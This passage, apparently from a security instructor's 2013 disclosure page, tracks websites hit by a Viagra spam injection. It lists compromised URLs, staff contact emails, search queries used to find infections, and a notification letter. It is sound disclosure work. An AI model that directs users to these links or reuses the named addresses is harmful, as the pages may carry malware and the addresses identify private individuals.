https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CDwQFjAC&url=http%3A%2F%2Fwww.metrostudy.com%2Fexternals%2Fskydeck-store%2Findex.php%3Fq%3Dbuy-viagra-in-san-francisco-77&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNHha6MJd4ui5T4zTJYEBy-wHttktw&sig2=o9PbT6lWJhPJsSk3RtwDKQ&bvm=bv.56988011,d.cGU | |
14. rivnet.com Texas |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CDQQFjAB&url=http%3A%2F%2Frivnet.com%2Ffiles%2Fbuy-viagra-in-san-francisco.html&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNE4lowkUqpEG3tZ82JcxJsakQPaVA&sig2=8lKR4_vM_K4Vl7P-q0D4DA&bvm=bv.56988011,d.cGU | |
15. wwpinfo.com NJ |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CEMQFjAD&url=http%3A%2F%2Fwww.wwpinfo.com%2F%3Fmcofoinwpw249%3Dhow-to-obtain-viagra-san-francisco&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNEJK1yhkRK4aukYoSfoWyW4lS7BKg&sig2=Kzr3G7WSEIOkzBKh_CLwyQ&bvm=bv.56988011,d.cGU | |
16. www.3dogcreative.biz Web site not up yet, but already infected |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CEoQFjAE&url=http%3A%2F%2Fwww.3dogcreative.biz%2Fwp-content%2Fwp%2F%3Fp%3D151&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNGBPM1BB-Y5RHc9-W7dL9sacPs1jQ&sig2=nnhgoz27M7Sg5Y93T9fIUA&bvm=bv.56988011,d.cGU | |
17. columbiagreenhouse.com NY |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CFEQFjAF&url=http%3A%2F%2Fcolumbiagreenhouse.com%2Foldsite%2Fphotos%2F1%2F%3Ft%3D493&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNHkz0Bfywio3VD3-Ynd3KpcDgOjEg&sig2=HfsekHrly84inOytQbJGrQ&bvm=bv.56988011,d.cGU | |
18. figurefinishing.com VA |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGQQFjAH&url=http%3A%2F%2Ffigurefinishing.com%2F%3Fbuy-viagra-in-san-francisco&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNEZSjIa7jlpLA6HFBootnF0wi_Y0Q&sig2=oiRHrs1DuDa_Fe1dYFTDiQ&bvm=bv.56988011,d.cGU | |
19. xoverland.com MT |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CGsQFjAI&url=http%3A%2F%2Fwww.xoverland.com%2Frssxvl.php%3Fl%3D92&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNGMAMJfrrAyKDMm0kDYlEC3Op-7rA&sig2=UXrgmCvBQ6HbJ05tZlStPw&bvm=bv.56988011,d.cGU | |
20. aaohn.org American Association of Occupational Health Nurses, FL |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHMQFjAJ&url=http%3A%2F%2Faaohn.org%2Fpharmacy.php%3Fproduct%3D10571&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNHp1M3--3joxExUh6vcpzN88sFM1w&sig2=c0EJ8FK1aiS0T4H2pPEUBA&bvm=bv.56988011,d.cGU | |
21. chatsoft.com Cloud service provider, NJ |
info@chatsoft.com Not the same defacement, notified via Twitter on 11-23-13 or 11-14-13 |
http://www.chatsoft.com/solutions/datamanagement/index.html |
22. collin.edu Texas |
Notified 11-23-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CFcQFjADOAo&url=http%3A%2F%2Fiws.collin.edu%2Fecoker%2Fimages%2Fbuy-viagra-san-francisco.html&ei=886QUvqRHsvWoASUjoJo&usg=AFQjCNFfhzXWWc7wMkf6Oe-rUPfcjLg8Cg&sig2=9snfjkM5uPqGeol1L9p3rA&bvm=bv.56988011,d.cGU |
23. yicca.org |
Site by redbulconsulting.com, a Swiss consulting firm
Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CGgQFjAHOAo&url=http%3A%2F%2Fyicca.org%2Frssyic.php%3Fyic%3D484&ei=886QUvqRHsvWoASUjoJo&usg=AFQjCNE4kwVB_Glliiz4KPsHgqLT03PPPQ&sig2=oahZQdHFKdpnAQIQqld3gQ&bvm=bv.56988011,d.cGU |
24. nrc.ie Dublin, Ireland |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CHAQFjAIOAo&url=http%3A%2F%2Fnrc.ie%2Fbuy-viagra-san-francisco.html&ei=886QUvqRHsvWoASUjoJo&usg=AFQjCNErTeHURaWcjumbe_vJ-FYfUIMWDA&sig2=8AeBbQTgEq5-UiWYn8jOBw&bvm=bv.56988011,d.cGU | |
25. flobots.com Website by djcoffman.com |
djcoffman@gmail.com
Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CC4QFjAA&url=http%3A%2F%2Fflobots.com%2Fpfizer-viagra-discount%2F&ei=2T-RUv27OMffoAS864LAAQ&usg=AFQjCNEil6kk8PJIniIu6eVGY0_bpDDt6w&sig2=-KIeiwGbkeZWP0-rML1W1A&bvm=bv.56988011,d.cGU |
Protect Your WordPress Website from a Pharma Hack (2012)
Google Viagra Hack Hitting Websites Hard
Gumblar .cn Exploit – 12 Facts About This Injected Script (2009)
Viagra ads appearing in google search results (2009)
This forum thread seems to be about an infection similar to the one I am seeing:
http://forum.avast.com/index.php?topic=131579.0
Rogues & Frauds « Canadian International Pharmacy Association
ohotdamn.com Redirects ~ canadian-pharmacy-24h.com
Buy Amitriptyline – canadian-pharmacy-24h.com
Discussion of this hacking technique from 2010
I used these Google searches:
inurl:UK intitle:viagra
inurl:uk intitle:viagra university
inurl:ac.uk intitle:viagra university
inurl:ac.uk intitle:viagra
@burrowingsec told me on Twitter about janet:
https://www.ja.net/support-advice/support/security-issues
So I notified them by email first ( service@ja.net ), rather than contacting each college individually.
That was a mistake. It is now 10 PM 11-26-13, and despite the promises at https://www.ja.net/support-advice/support/security-issues that they will respond within one or two hours, here I am, 36 hours after my first notification by email, 21 hours after @mark_s0 alerted them via Twitter, and 6 hours after my second notification by email. They have not responded to any of them, and the first 5 colleges on my list remain vulnerable. Ja.net is worse than useless, they just slow down repairs with their lies.
So I resume what I should have done in the first place, and contact the colleges directly.
Wow! That worked! The next day, 11-27-13, I tested them and 9/12 have been cleaned, apparently by deleting files or shutting off infected servers.
Organization | Emails | Malicious URL |
---|---|---|
1. www.targettravel.co.uk |
admin@targettravel.info abuse@targettravel.info security@targettravel.info Notified directly 11-26-13 Still infected 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CE4QFjAE&url=http%3A%2F%2Fwww.targettravel.co.uk%2Fviagra-uk-supplier.html&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNEPEC4Xk4UkVMHCGjYWnwDQsxRdSw&sig2=JV3uN_kNSrCny56V5LlpSw&bvm=bv.56988011,d.cGU |
2. wccsj.ac.uk Welsh Centre for Crime and Social Justice |
admin@wccsj.ac.uk abuse@wccsj.ac.uk security@wccsj.ac.uk Notified directly 11-26-13 Still infected 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CGEQFjAG&url=http%3A%2F%2Fwccsj.ac.uk%2Findex.php%3Fid%3D123137&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNFAk_vZczVyKhEWuX69y3X5aKtQbw&sig2=xT3Da_5LAGABDsC5kMs5sA&bvm=bv.56988011,d.cGU
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGkQFjAH&url=http%3A%2F%2Fwccsj.ac.uk%2Findex.php%3Fid%3D123287&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNFlM1bFAF_s1Q-cLWj_NJwbmgOVqg&sig2=2T_MpWV716UYjLoat5gbHw&bvm=bv.56988011,d.cGU |
3. hip.hertford.ox.ac.uk Oxford University |
louise.turner@hertford.ox.ac.uk security@hertford.ox.ac.uk abuse@hertford.ox.ac.uk andrew.hemingway@hertford.ox.ac.uk Notified directly 11-26-13 Still infected 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHgQFjAJ&url=http%3A%2F%2Fhip.hertford.ox.ac.uk%2Fviagra%2F&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNHdQLUhdt1SJ22JS-R6jbzevjmeuQ&sig2=7Jhk36XEqaTnIeTHIHc31Q&bvm=bv.56988011,d.cGU |
4. studyingeconomics.ac.uk U. of Bristol |
econ-network@bristol.ac.uk webmaster@bristol.ac.uk abuse@bristol.ac.uk security@bristol.ac.uk A.Bernays@bristol.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFYQFjAFOAo&url=http%3A%2F%2Fstudyingeconomics.ac.uk%2Fgames-and-books%2F%3Fc3r1z%3D681291&ei=BnSTUs-XC4_YoASdwYKIAg&usg=AFQjCNGkH30VSsigQhRR7A2BnvqRE9pQUA&sig2=afk7SdZWe6Oo1gyTlfYNMA&bvm=bv.57127890,bs.1,d.cGE&cad=rja |
5. www.met.reading.ac.uk U. of Reading |
infosec@met.reading.ac.uk webmaster@reading.ac.uk secuity@reading.ac.uk abuse@reading.ac.uk vc@reading.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=27&ved=0CFoQFjAGOBQ&url=http%3A%2F%2Fwww.met.reading.ac.uk%2F~sws96srb%2Fuploads%2Fupload%2Flunchsem.php%3Fdc%3D1682&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNGR2z9NsMiI0DqinKezG5VkHx5cQg&sig2=kYUGqOD11Isu5_V9DQ5wJA&bvm=bv.56988011,d.cGU |
6. www.cemmap.ac.uk Economic and Social Research Council |
emma_h@ifs.org.uk abuse@ifs.org.uk security@ifs.org.uk websupport@esrc.ac.uk angela.newton@esrc.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=28&ved=0CGMQFjAHOBQ&url=http%3A%2F%2Fwww.cemmap.ac.uk%2Fwps%2Fonline%2F%3Fmedic%3D42386-ViagRX-viagra-tablets-sale&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNForrP6m0Vu_-OeKWn3av0MyotYFA&sig2=BGHWJ1vpPF_iPq2pVnnQUA&bvm=bv.56988011,d.cGU |
7. cardiffmet.ac.uk Cardiff Metropolitan U. |
izone@cardiffmet.ac.uk abuse@cardiffmet.ac.uk security@cardiffmet.ac.uk izone@cardiffmet.ac.uk hward@effcom.co.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=30&ved=0CHEQFjAJOBQ&url=http%3A%2F%2Fceramics.cardiffmet.ac.uk%2Fresources%2Fsuperdrug-uk-viagra&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNHh4kbCHDBqSMahWEyO_aYrpAGO4w&sig2=MZGm_bGd-yJpNKUKIeSoDw&bvm=bv.56988011,d.cGU
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=29&ved=0CGoQFjAIOBQ&url=http%3A%2F%2Fceramics.cardiffmet.ac.uk%2Fresources%2Fviagra-through-customs-uk&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNG-4yyKatNp9Oqt4lPHz3LXL_RWpw&sig2=JEeU5jVHROMeQx1-gtZAkw&bvm=bv.56988011,d.cGU |
8. www.cranfield.ac.uk Cranfield U. |
mediarelations@cranfield.ac.uk security@cranfield.ac.uk abuse@cranfield.ac.uk info@cranfield.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CEsQFjAEOAo&url=http%3A%2F%2Faerade.cranfield.ac.uk%2Fimages%2Frgam%2F%3Fapiqyf%3D196%26bibywuqy%3Dviagra&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNEnErjuCDaR2QXx972TvBBa4aq87g&sig2=WRD5YXEKow1RhAOvptB36A&bvm=bv.56988011,d.cGU
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFQQFjAFOAo&url=http%3A%2F%2Faerade.cranfield.ac.uk%2Fimages%2Frgam%2F%3Fapiqyf%3D4%26bibywuqy%3Dviagra&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNG5NMyVIYo2gzS4-PGxDUAK9b_Usw&sig2=Q_oSBJUiPpKfZM8a2OpKsw&bvm=bv.56988011,d.cGU https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CFwQFjAGOAo&url=http%3A%2F%2Faerade.cranfield.ac.uk%2Fimages%2Frgam%2F%3Fapiqyf%3D225%26bibywuqy%3Dviagra&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNG5C5lSb1AQBQKOmHz7gauH5UZ6gA&sig2=b4RUGCAQ_tEsEvfa7olAcw&bvm=bv.56988011,d.cGU |
9. rca.ac.uk Royal College of Art |
info@rca.ac.uk abuse@rca.ac.uk security@rca.ac.uk ied@rca.ac.uk media@rca.ac.uk publications@rca.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CGUQFjAHOAo&url=http%3A%2F%2Fwww.di09.rca.ac.uk%2Fwp-content%2Fuploads%2Floenga%2F103-viagra.html&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNFlcmx5STMygRXNA2Rznz_h5sCm-w&sig2=4mlkERaImer88RDtorgRzw&bvm=bv.56988011,d.cGU
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CG0QFjAIOAo&url=http%3A%2F%2Fwww.di09.rca.ac.uk%2Fwp-content%2Fuploads%2Floenga%2F157-viagrx.html&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNGWqUf_qQTZUJ2_ZrzHCXI4LyLeLw&sig2=-3aV-L0oSJ0ProTmKJx7Ig&bvm=bv.56988011,d.cGU |
10. wlecentre.ac.uk Institute of Education, London |
info@ioe.ac.uk security@ioe.ac.uk abuse@ioe.ac.uk security@wlecentre.ac.uk abuse@wlecentre.ac.uk web.editor@ioe.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
http://www.wlecentre.ac.uk/index.php/viagra-sales |
11. rhul.ac.uk Royal Holloway U. of London |
iQuad@rhul.ac.uk security@rhul.ac.uk Notified directly 11-26-13 Cleaned 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGcQFjAIOB4&url=http%3A%2F%2Fwww.scc.rhul.ac.uk%2Fmwidmer%2FPublications%2F%3Fwhere%3D2924%26what%3Dviagra%2Bsubstitute%2Buk&ei=nY6TUuvcBcztoATV14CwBQ&usg=AFQjCNG2xt-lmlojaxdN61fFxQisWED-WA&sig2=eSsb3pwcgDh7wmgiEe2tIQ&bvm=bv.56988011,d.cGU
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHAQFjAJOB4&url=http%3A%2F%2Fwww.scc.rhul.ac.uk%2Fmwidmer%2FPublications%2F%3Fwhere%3D4387%26what%3Dviagra%2Brezeptfrei%2Bschweiz&ei=nY6TUuvcBcztoATV14CwBQ&usg=AFQjCNHXYX9HkUK2ulD5bovGZpJWfzqVdg&sig2=8OWwTRVFtQhpRyFZCIX2VA&bvm=bv.56988011,d.cGU |
12. strethamschool.co.uk Stretham Primary School |
office@stretham.cambs.sch.uk security@stretham.cambs.sch.uk abuse@stretham.cambs.sch.uk Notified directly 11-26-13 Still infected 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHIQFjAJOB4&url=http%3A%2F%2Fwww.strethamschool.co.uk%2Fwp-content%2Fthemes%2Fgracio%2Fview-generic_viagra_cheap_prices.NzM1.html&ei=Z6aTUuz_DsreoATXwYGoBA&usg=AFQjCNEYT325h1PVm_kWNNp6LYvXKKihJA&sig2=qRLTPj_bkD3Wywafx2HBBA&bvm=bv.56988011,d.cGU |
I'll rearrange these as I proceed to other countries.
Organization | Emails | Malicious URL |
---|---|---|
1. www.iospress.nl Science book publisher |
iospress@accucoms.com abuse@accucoms.com security@accucoms.com abuse@accucoms.com editorial@iospress.nl security@iospress.nl abuse@iospress.nl http://twitter.com/IOSPress_STM Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CD8QFjAC&url=http%3A%2F%2Fwww.iospress.nl%2Forder-viagra-uk%2F&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNFkDnoND5tbHHzyPLXM_FYuz_oCFQ&sig2=VLGnW8AXLxJqak4N0vyIDg&bvm=bv.56988011,d.cGU |
4. www.gaylea.com Many locations, but neither US nor UK |
questions@gayleafoods.com security@gayleafoods.com abuse@gayleafoods.com Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CHEQFjAI&url=http%3A%2F%2Fwww.gaylea.com%2Fviagra-alternative-uk%2F&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNGgwljON9etvbIadjxu1gDc7Yj_4A&sig2=6TCNwDzhv7smHlca1m95jA&bvm=bv.56988011,d.cGU
Not a redirection, hosted on their server, but only visible from Google
http://www.gaylea.com/dr-buying-viagra-online/
|
5. www.redleafresort.com.au |
reservations@redleafresort.com.au security@redleafresort.com.au abuse@redleafresort.com.au Notified 11-25-13 |
http://www.redleafresort.com.au/fast-mail-order-viagra/
http://www.redleafresort.com.au/tag-viagra-without-prescription/ http://www.redleafresort.com.au/ed-order-viagra/ http://www.redleafresort.com.au/a-erectile-dysfunction-viagra/ http://www.redleafresort.com.au/ed-cheap-viagra-from-canada/ Visible directly, not just from Google |
6. thiefandbandit.com |
thiefandbandit@gmail.com
Notified 11-25-13 |
http://thiefandbandit.com/a-buy-viagra-in-great-britain/
Visible directly, not just from Google |
7. www.petetribal.org |
klaflin@maine.rr.com sgrosse@maine.rr.com Notified 11-25-13 |
http://www.petetribal.org/in-cialis-commercial/
Visible directly |
8. www.cmmsmadeeasy.com Software company in WI, Site is incomplete |
abuse@cmmsmadeeasy.com security@cmmsmadeeasy.com Notified 11-25-13 |
http://www.cmmsmadeeasy.com/med-cialis-super-active/
Directly visible |
9. www.gaywellington.org |
helpline@gaywellington.org abuse@gaywellington.org security@gaywellington.org Notified 11-25-13 |
http://www.gaywellington.org/page-genaric-cialis/
Directly visible |
11. solidifi.com Appraisers in NY |
clientsupport@solidifi.com contactus@solidifi.com ABUSE@solidifi.com security@solidifi.com Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CCsQFjAAOAo&url=http%3A%2F%2Fsolidifi.com%2Fbuy-uk-viagra%2F&ei=3G-TUti_KsHcoASDt4DYDw&usg=AFQjCNGmWN0VgD2blzs5ueLe2TsgaEcjpA&sig2=aayhKBmmXZ2YWipfGuL2jQ&bvm=bv.56988011,d.cGU |
12. www.jessicashops.com |
http://twitter.com/jessicashops security@jessicashops.com abuse@jessicashops.com Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CEIQFjADOAo&url=http%3A%2F%2Fwww.jessicashops.com%2Fviagra-sale-uk%2F&ei=3G-TUti_KsHcoASDt4DYDw&usg=AFQjCNFRXa-_bfpIktfY5VO0fW_RHQvFiA&sig2=CHi2mViORBMw2DcsWP9PTg&bvm=bv.56988011,d.cGU |
13. www.blonk.it Italian book publisher |
info@blonk.it security@blonk.it abuse@blonk.it Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CGgQFjAHOAo&url=http%3A%2F%2Fwww.blonk.it%2Fuk-viagra-cheap%2F&ei=3G-TUti_KsHcoASDt4DYDw&usg=AFQjCNEUwlKnBC2wn75lPhMN0MJEpIDMJA&sig2=bHI0GP1cAfS17jKGznK8-Q&bvm=bv.56988011,d.cGU |
18. uns.ac.id Indonesia |
security@uns.ac.id abuse@uns.ac.id Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGgQFjAIOB4&url=http%3A%2F%2Fekonomi.fkip.uns.ac.id%2F%3Fac-uk-buy-viagra&ei=SHqTUo24EczXoAT-64CwDQ&usg=AFQjCNEIGSsisNa_0zQsVkeI4yXh_SAb5w&sig2=EQUNyTPc4QvhNXFWT1r58w&bvm=bv.56988011,d.cGU |
19. uga.edu U of Georgia |
security@uga.edu abuse@uga.edu sebailey@uga.edu uc@uga.edu Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFYQFjAFOAo&url=http%3A%2F%2Fwww.forestry.uga.edu%2Fnews%2Fwp-content%2Fuploads%2F2013%2F02%2Fsql.php%3Fp%3Dbuy-viagra-in-vancouver&ei=g5iTUp-zL9jtoATGhILQCA&usg=AFQjCNErXq9q7nSvgwyUUmGNQdrm2otteg&sig2=3_amtwGrf8bpB8mMMcBQpg&bvm=bv.56988011,d.cGU |
20. ambassador.edu California |
Registrar@ambassador.edu security@ambassador.edu abuse@ambassador.edu Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=31&ved=0CCsQFjAAOB4&url=http%3A%2F%2Fwww.ambassador.edu%2Fphp.php%3Fnunun%3Dvic.edu.au-buy-viagra%26nun%3D3&ei=eqKTUvfNIsHmoATotoH4Dg&usg=AFQjCNHy2RuGD_FjvXAiZQjrtzqvIh3GeQ&sig2=Sb7gSjtNQI6gneeFGC9nAA&bvm=bv.56988011,d.cGU |
21. wku.edu Western Kentucky University |
wku@wku.edu abuse@wku.edu security@wku.edu torie.cockriel@wku.edu Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=35&ved=0CEgQFjAEOB4&url=http%3A%2F%2Fip205-109.ieb.wku.edu%2Fsuccess.php%3Fkokok%3Dvic.edu.au-buy-viagra%26hoh%3D3&ei=eqKTUvfNIsHmoATotoH4Dg&usg=AFQjCNGBT3C5l-f7lrwVva6_KK3MZ0mUVw&sig2=VfP-2tQYGnlnRgXDSMkmiw&bvm=bv.56988011,d.cGU |
22. harvard.edu |
@harvard president@harvard.edu abuse@harvard.edu security@harvard.edu ranna_farzan@harvard.edu, scott_fields@harvard.edu Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CEgQFjAEOAo&url=http%3A%2F%2Fwww.hcs.harvard.edu%2Fiop%2Fwp-content%2Fuploads%2F2011%2F07%2F%3Fvn%3Dviagra-au%26f%3D2&ei=pKSTUpGINYP3oAT484KYCQ&usg=AFQjCNHqoyAj1Q5zxY9rDNxlBUwizH5bRw&sig2=727rDcHGz7vJExtz9b4Pig&bvm=bv.56988011,d.cGU |
23. www.sutherlandclinic.com Tennessee |
Cbmaccallum@sutherlandclinic.com abuse@sutherlandclinic.com security@sutherlandclinic.com Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CDQQFjAB&url=http%3A%2F%2Fwww.sutherlandclinic.com%2Fcardiologyexperts.html&ei=hqeTUrvqNcH6oASUzYDwBg&usg=AFQjCNHnHdwsOKlVdDzVeuPtxTm75BqQmQ&sig2=wLSIsaLDlFSfRFBtLmybTQ&bvm=bv.56988011,d.cGU |
inurl:ac.nz intitle:viagra
Organization | Emails | Malicious URL |
---|---|---|
1. apsa.ac.nz U. of Auckland |
admin@auckland.ac.nz abuse@auckland.ac.nz studentinfo@auckland.ac.nz t.greene@auckland.ac.nz fmhsweb@auckland.ac.nz Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CG8QFjAI&url=http%3A%2F%2Fapsa.ac.nz%2F%3Fp%3Dhow-to-buy-viagra-30-pills-in-uk%26eq%3Dviagra&ei=2ZmTUpb8CYbxoATb54LwDg&usg=AFQjCNG88Lge4bgaz-zAsO1gUTlvPOfA8Q&sig2=HT-n7MYj7ByYEaS89bDanQ&bvm=bv.56988011,d.cGU
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHYQFjAJ&url=http%3A%2F%2Fapsa.ac.nz%2F%3Fp%3Dbuy-female-viagra-30-pills-100-mg-76-06usd-overnight-shipping%26iq%3Dfemale-viagra&ei=2ZmTUpb8CYbxoATb54LwDg&usg=AFQjCNHRijndrYs1Iz-f0uQfrlgnjG_3ig&sig2=PHmj6FeWBjenUqBAAtqnqQ&bvm=bv.56988011,d.cGU https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CCsQFjAAOAo&url=http%3A%2F%2Fapsa.ac.nz%2F%3Fp%3Dfemale-viagra-without-prescriptione%26dv%3Dfemale-viagra&ei=GpuTUqbOMtTToASg2YCoAQ&usg=AFQjCNGu4F9IhryCu7I9tnANUFUzxZ4wNA&sig2=cYkn6lHL-iw1lihdzTr_Ig&bvm=bv.56988011,d.cGU |
inurl:.edu.au intitle:viagra
inurl:.au intitle:viagra school
Organization | Emails | Malicious URL |
---|---|---|
1. usyd.edu.au U. of Sydney |
admin@sydney.edu.au abuse@sydney.edu.au vice.chancellor@sydney.edu.au Notified 11-25-13 |
http://acl.arts.usyd.edu.au/threecities/index.php?option=com_content&task=view&itemes=viagra |
2. icms.edu.au International College of Management, Sydney |
admin@icms.edu.au abuse@icms.edu.au info@icms.edu.au tmaillet@icms.edu.au dshiell@icms.edu.au Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CD0QFjAC&url=http%3A%2F%2Fwww.icms.edu.au%2Fed%2Fviagra-online&ei=fZuTUqayKoXwoASOgILYDw&usg=AFQjCNEc1_-QU8CNZup221vUc_Y5kP6G0g&sig2=-Rug8h2yFcngyr_MdtJ96A&bvm=bv.56988011,d.cGU |
3. www.bethany.sa.edu.au Bethany Christian School |
karen.julius@bethany.sa.edu.au admin@is.sa.edu.au abuse@is.sa.edu.au office@ais.sa.edu.au Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CEYQFjAD&url=http%3A%2F%2Fwww.bethany.sa.edu.au%2Findex.php%3Fid%3D217572&ei=fZuTUqayKoXwoASOgILYDw&usg=AFQjCNF8hKuGYFfGffkKzmwv1NzJbsYdrw&sig2=rMyltfzj63ZTHPCvxj_qLA&bvm=bv.56988011,d.cGU |
4. www.unsw.edu.au U. of New South Wales |
https://twitter.com/unsw admin@unsw.edu.au abuse@unsw.edu.au vice-chancellor@unsw.edu.au shane.coxATunsw.edu.au Notified 11-25-13 |
https://collab.phys.unsw.edu.au/gens4015/index.php/Viagra
https://collab.phys.unsw.edu.au/gens4015/index.php/Generic_viagra https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CEAQFjADOAo&url=http%3A%2F%2Fmembranes.edu.au%2Fblog%2Fhkiu%2Flopybis-buying-using-paypal%2F&ei=X6GTUtuYFcLroAT8mYLACA&usg=AFQjCNHY_lt3svo4go_y6u6n5WF1wWYqJw&sig2=fQ7LGGhrwWBMoN2vVEkJ7g&bvm=bv.56988011,d.cGU That one redirects to a viagra site that is down now, but the infection is still present on your server |
5. qsma.org.au Queensland Self-Management Alliance |
admin@arthritis.org.au abuse@arthritis.org.au helene@arthritis.org.au Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=24&ved=0CEIQFjADOBQ&url=http%3A%2F%2Fqsma.org.au%2Fdmdocuments%2FMzA4.html&ei=oqWTUuWxJc_zoAS-4YCgBg&usg=AFQjCNHH4JAOU2OLcZrb6Qgjk1WSSN87gA&sig2=PWR2uVU7Ovf09PY8IltR-g&bvm=bv.56988011,d.cGU&cad=rja |
Here's the letter I used:
Subject: Infection on Your Server
Hello:
I am Sam Bowne, an Instructor in Computer Networking and Information Technology at City College San Francisco.
Your web server has been hacked, and is being used to drive traffic to a site selling Viagra. This is a form of identity theft, stealing your good reputation.
To see the infection, visit the URL below. I recommend using a Mac or Linux machine to perform this test because the pages that open may contain malware.
Please alert your webmaster.
Many companies I have warned simply deleted the infected files, but they often restore themselves. I would like to do a more thorough analysis of this malware to guide people in cleaning it.
If you are interested in joining a working group to analyze this infection, please email me.
Details are here: http://samsclass.info/125/proj11/subtle-infect.htm
So the colleges I have been notifying are really secondary to the monetization of the scheme.
To hit this thing at its root, it seems valuable to get the sites that directly make money for them: online viagra sales.
I used these Google searches:
buy viagra
buy viagra online
Organization | Emails | Malicious URL |
---|---|---|
Hit 1. tobuyviagra.com |
Whois leads to: http://privacyprotect.org/contact/ Reported on 11-27-13 |
http://tobuyviagra.com/
Directly hosted page |
